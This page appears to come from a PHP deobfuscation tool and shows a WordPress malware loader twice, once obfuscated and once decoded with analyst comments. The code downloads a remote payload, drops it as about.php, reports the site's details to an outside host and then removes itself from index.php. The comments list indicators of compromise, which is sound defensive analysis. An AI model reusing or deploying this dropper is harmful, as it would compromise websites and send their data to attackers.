
PHP deobfuscation, decryption, reconstruction tool

Deobfuscate PHP malware, viruses and tampered code found on WordPress sites back into readable code.

* Please note that not every obfuscation scheme can be decoded.

The code below has been decoded.

<?php $O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O0...



Obfuscated PHP code

<?php  $O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{27}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O0_O0_O0O_=$O00OO_0_O_{32}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{6}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{38}.$O00OO_0_O_{18}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{10}.$O00OO_0_O_{12}.$O00OO_0_O_{35}.$O00OO_0_O_{0};$OOO0_O0_0_=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$OO0O___0O0=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{26}.$O00OO_0_O_{30}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$O_O_0_O00O=$O00OO_0_O_{16}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{27}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_00O0OO__=$O00OO_0_O_{33}.$O00OO_0_O_{10}.$O00OO_0_O_{24}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_0_O0_O0O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{35}.$O00OO_0_O_{16}.$O00OO_0_O_{10};$O_O_O000_O=$O00OO_0_O_{32}.$O00OO_
0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{23}.$O00OO_0_O_{35}.$O00OO_0_O_{33}.$O00OO_0_O_{30};$O___00OO0O=$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{24}.$O00OO_0_O_{12}.$O00OO_0_O_{6}.$O00OO_0_O_{23}.$O00OO_0_O_{12}.$O00OO_0_O_{2}.$O00OO_0_O_{30};$O__0O0_0OO=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{12}.$O00OO_0_O_{0}.$O00OO_0_O_{12}.$O00OO_0_O_{10};$O_OO_O000_=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{17}.$O00OO_0_O_{30}.$O00OO_0_O_{32};$OO0O0__O0_=${"GLOBALS"}["O0_O0_O0O_"]('$O__O00_OO0=\'\'','if(isset(${"_SERVER"}["HTTP_HOST"])){return ${"_SERVER"}["HTTP_HOST"];}elseif(isset(${"_SERVER"}["SERVER_NAME"])){return ${"_SERVER"}["SERVER_NAME"];}return $O__O00_OO0;');$OOO_O00_0_=${"GLOBALS"}["O0_O0_O0O_"]('$url','$OO0O0_0_O_=@${"GLOBALS"}["O_0O_0O0O_"]($url);if(!$OO0O0_0_O_){$O0O0_O_0O_=${"GLOBALS"}["O__0O0_0OO"]();${"GLOBALS"}["O_0_O0_O0O"]($O0O0_O_0O_,CURLOPT_URL,$url);${"GLOBALS"}["O_0_O0_O0O"]($O0O0_O_0O_,CURLOPT_RETURNTRANSFER,1);$OO0O0_0_O_=${"GLOBALS"}["O_OO_O000_"]($O0O0_O_0O_);${"GLOBALS"}["O_O_O000_O"]($O0O0_O_0O_);}return 
$OO0O0_0_O_;');$O_OO__0O00=${"GLOBALS"}["O0_O0_O0O_"]('$O_0O_O_0O0=\'\'','$O_0_O_OO00=array();$O_0_O_OO00["path"]=${"GLOBALS"}["O_00O0OO__"](${"GLOBALS"}["O_00O0OO__"](\'//\',\'/\',${"_SERVER"}["PHP_SELF"]),\'\',${"GLOBALS"}["O_00O0OO__"](\'\\\\\',\'/\',${"_SERVER"}["SCRIPT_FILENAME"]));$O_0_O_OO00["domain"]=${"GLOBALS"}["OO0O0__O0_"]();$O_0_O_OO00["shell_link"]=${"GLOBALS"}["OO0O___0O0"](\'aHR0cHM6Ly9oYWxhbGhpZ2hsaWdodHMuY29tL2Fib3V0LnBocD81MjA=\');if(isset(${"_GET"}["del"])&&${"_GET"}["del"]=="my_code"){$O0_0OO_O0_=$O_0_O_OO00["path"]."/index.php";$OO0O0O0___=@${"GLOBALS"}["O_0O_0O0O_"]($O0_0OO_O0_);$O_OO_0_0O0=${"GLOBALS"}["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"GLOBALS"}["O_O_0_O00O"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);$OO0O0O0___=@${"GLOBALS"}["O000OOO___"]($O0_0OO_O0_,$OO0O0O0___);if($OO0O0O0___>0){die("delete success");}die("delete failed");}$OO_O__O000=${"GLOBALS"}["OO0O___0O0"]("YWJvdXQucGhw");$O0O_0_O0_O=$O_0_O_OO00["path"]."/".$OO_O__O000;$OO0O0O0___=@${"GLOBALS"}["OOO_O00_0_"](${"GLOBALS"}["OO0O___0O0"]("aHR0cDovLzUxbGEuaXp2NC5jb20vYS50eHQ="));$OO0O0O0___=@${"GLOBALS"}["O000OOO___"]($O0O_0_O0_O,$OO0O0O0___);if($OO0O0O0___>0){$O_0_O_OO00["trojan"]="http://".$O_0_O_OO00["domain"]."/".$OO_O__O000;}else{$O_0_O_OO00["trojan"]="write failed";}$OO_0O00O__=sprintf(${"GLOBALS"}["OO0O___0O0"](\'aHR0cDovLzUxbGEuaXp2NC5jb20vP2Q9JXM=\'),${"GLOBALS"}["OOO0_O0_0_"](${"GLOBALS"}["O___00OO0O"]($O_0_O_OO00)));$O__OO0O00_=${"GLOBALS"}["OOO_O00_0_"]($OO_0O00O__);if($O__OO0O00_=="done"){$O0_0OO_O0_=$O_0_O_OO00["path"]."/index.php";$OO0O0O0___=@${"GLOBALS"}["O_0O_0O0O_"]($O0_0OO_O0_);$O_OO_0_0O0=${"GLOBALS"}["OO0O___0O0"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"GLOBALS"}["O_O_0_O00O"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);@${"GLOBALS"}["O000OOO___"]($O0_0OO_O0_,$OO0O0O0___);}');${"GLOBALS"}["O_OO__0O00"](1);?>

Decoded (deobfuscated) PHP code

<?php

// Lookup alphabet. In the obfuscated original every function name below is
// assembled one character at a time from offsets into this string
// (offsets 38, 12, 23, 30 give "file"); the decoder has already resolved them.
// The original uses curly-brace string offsets ($s{38}) and create_function(),
// both removed in PHP 8.0, so the obfuscated form only runs on older PHP.
$O00OO_0_O_ = "n1zb/ma5\\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j";
// Resolved names. The original calls them indirectly through $GLOBALS[...],
// so none of these function names appears literally in the obfuscated file.
// Local file read/write: used on index.php and on the dropped file.
$O000OOO___ = "file_put_contents";
$O_0O_0O0O_ = "file_get_contents";
// Builds the three routines below from code held in string arguments.
$O0_O0_O0O_ = "create_function";
// base64_decode unpacks the embedded URLs, file name and regex;
// base64_encode packs the report sent back to the remote host.
$OOO0_O0_0_ = "base64_encode";
$OO0O___0O0 = "base64_decode";
// Used to cut the injected loader out of index.php.
$O_O_0_O00O = "preg_replace";
// Used to derive the site directory from $_SERVER values.
$O_00O0OO__ = "str_replace";
// cURL is the fallback transport when file_get_contents() returns nothing.
$O_0_O0_O0O = "curl_setopt";
$O_O_O000_O = "curl_close";
// Serialises the report array before it is base64-encoded.
$O___00OO0O = "serialize";
$O__0O0_0OO = "curl_init";
$O_OO_O000_ = "curl_exec";
// Returns the host name of the infected site: HTTP_HOST when set, otherwise
// SERVER_NAME, otherwise the default passed in (an empty string).
// HTTP_HOST is taken from the request's Host header, so the value reported
// later is whatever the requesting client supplied.
$OO0O0__O0_ = function ($O__O00_OO0 = '') {
    if (isset($_SERVER["HTTP_HOST"])) {
        return $_SERVER["HTTP_HOST"];
    } elseif (isset($_SERVER["SERVER_NAME"])) {
        return $_SERVER["SERVER_NAME"];
    }
    return $O__O00_OO0;
};
// Fetches $url and returns the response body.
// Tries file_get_contents() first with warnings suppressed by "@"; if that
// yields a falsy result (false, an empty body, or "0") it retries with cURL.
// The cURL handle sets only the URL and RETURNTRANSFER; no timeout or other
// option is configured here.
$OOO_O00_0_ = function ($url) {
    $OO0O0_0_O_ = @file_get_contents($url);
    if (!$OO0O0_0_O_) {
        $O0O0_O_0O_ = curl_init();
        curl_setopt($O0O0_O_0O_, CURLOPT_URL, $url);
        curl_setopt($O0O0_O_0O_, CURLOPT_RETURNTRANSFER, 1);
        $OO0O0_0_O_ = curl_exec($O0O0_O_0O_);
        curl_close($O0O0_O_0O_);
    }
    return $OO0O0_0_O_;
};
// Main routine of the loader (analyst annotations; code is the decoder's output).
// Summary of what the visible code does:
//   1. works out the directory that holds the site's index.php,
//   2. downloads a remote payload and writes it there as about.php,
//   3. reports path, host name and the payload URL to a remote host,
//   4. removes its own injected code from index.php when told "done".
// Indicators visible in this sample: the hosts 51la.izv4.com and
// halalhighlights.com, a file named about.php next to index.php, and requests
// carrying ?del=my_code. Because of step 4 a clean-looking index.php does not
// show that the site is clean; about.php stays behind.
// The parameter is accepted but never read.
$O_OO__0O00 = function ($O_0O_O_0O0 = '') {
    $O_0_O_OO00 = array();
    // SCRIPT_FILENAME with backslashes normalised, minus the PHP_SELF part:
    // the filesystem directory the running script is served from
    // (presumably the web root when the loader sits in the top-level index.php).
    $O_0_O_OO00["path"] = str_replace(str_replace('//', '/', $_SERVER["PHP_SELF"]), '', str_replace('\\', '/', $_SERVER["SCRIPT_FILENAME"]));
    $O_0_O_OO00["domain"] = $GLOBALS["OO0O0__O0_"]();
    // Hard-coded URL included in the report; it is not fetched anywhere in this code.
    // NOTE(review): the host may itself be a compromised site - confirm before attributing.
    $O_0_O_OO00["shell_link"] = "https://halalhighlights.com/about.php?520";
    // Remote clean-up switch. The only check is the query-string value (loose ==),
    // so any request with ?del=my_code reaches this branch; such requests in
    // access logs indicate interaction with the implant.
    if (isset($_GET["del"]) && $_GET["del"] == "my_code") {
        $O0_0OO_O0_ = $O_0_O_OO00["path"] . "/index.php";
        $OO0O0O0___ = @file_get_contents($O0_0OO_O0_);
        // Pattern source as decoded; the original interpolates this variable into
        // the regex, the decoder has inlined it in the call below.
        $O_OO_0_0O0 = "<\\?php.+\\(1\\);\\?>";
        // Greedy ".+" with the "s" flag: removes everything from the first "<?php"
        // up to the last "(1);?>" in the file, which is how the injected loader
        // ends (see the final call of this sample).
        $OO0O0O0___ = preg_replace("/<\\?php.+\\(1\\);\\?>/si", '', $OO0O0O0___);
        $OO0O0O0___ = @file_put_contents($O0_0OO_O0_, $OO0O0O0___);
        // file_put_contents() returns the byte count, so an index.php left empty
        // after stripping is reported as a failure.
        if ($OO0O0O0___ > 0) {
            die("delete success");
        }
        die("delete failed");
    }
    // Second stage: the body of a.txt is written verbatim to <path>/about.php.
    // The payload itself is not part of this page. The download uses plain HTTP.
    $OO_O__O000 = "about.php";
    $O0O_0_O0_O = $O_0_O_OO00["path"] . "/" . $OO_O__O000;
    $OO0O0O0___ = @$GLOBALS["OOO_O00_0_"]("http://51la.izv4.com/a.txt");
    // If the download failed, a false/empty value is written, which may still
    // leave a zero-byte about.php on disk.
    $OO0O0O0___ = @file_put_contents($O0O_0_O0_O, $OO0O0O0___);
    if ($OO0O0O0___ > 0) {
        // Public URL of the dropped file, built from the host name collected above.
        $O_0_O_OO00["trojan"] = "http://" . $O_0_O_OO00["domain"] . "/" . $OO_O__O000;
    } else {
        $O_0_O_OO00["trojan"] = "write failed";
    }
    // Report: base64(serialize(array)) with keys path, domain, shell_link, trojan,
    // sent in the "d" query parameter over plain HTTP.
    $OO_0O00O__ = sprintf("http://51la.izv4.com/?d=%s", base64_encode(serialize($O_0_O_OO00)));
    $O__OO0O00_ = $GLOBALS["OOO_O00_0_"]($OO_0O00O__);
    // Self-removal: once the remote host answers "done" the loader is cut out of
    // index.php with the same pattern as the clean-up branch; about.php is left in place.
    if ($O__OO0O00_ == "done") {
        $O0_0OO_O0_ = $O_0_O_OO00["path"] . "/index.php";
        $OO0O0O0___ = @file_get_contents($O0_0OO_O0_);
        $O_OO_0_0O0 = "<\\?php.+\\(1\\);\\?>";
        $OO0O0O0___ = preg_replace("/<\\?php.+\\(1\\);\\?>/si", '', $OO0O0O0___);
        @file_put_contents($O0_0OO_O0_, $OO0O0O0___);
    }
};
// Runs the routine as soon as the infected file is loaded; the argument 1 is unused.
$GLOBALS["O_OO__0O00"](1);

